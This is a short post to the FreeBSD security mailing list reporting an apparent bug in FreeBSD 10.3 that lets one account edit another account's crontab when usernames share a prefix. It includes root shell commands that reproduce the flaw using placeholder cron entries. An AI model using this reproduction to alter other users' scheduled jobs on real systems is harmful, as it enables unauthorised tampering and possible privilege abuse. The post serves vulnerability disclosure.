Probably a lot of freebsd servers affected Security bug allows to edit other users crontab
root# pw useradd -n www.promspecbud.com -g nobody -s /bin/sh -d /tmp root# pw useradd -n www.promspecbud.com.other -g nobody -s /bin/sh -d /tmp root# echo @daily doit baby > /tmp/test root# crontab -u www.promspecbud.com.other /tmp/test root# crontab -u www.promspecbud.com -l =====output ===== @daily doit baby ================= root#echo @daily doit baby one more time>> /tmp/test root#sudo -u www.promspecbud.com.other crontab /tmp/test root#sudo -u www.promspecbud.com crontab -l =====output ===== @daily doit baby @daily doit baby one more time ================= root# uname -a FreeBSD kuzik 10.3-RELEASE FreeBSD 10.3-RELEASE #0 r297264: Fri Mar 25 02:10:02 UTC 2016 r...@releng1.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64 best regards, Andrii Kuzik _______________________________________________ freebsd-security@freebsd.org mailing list https://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"
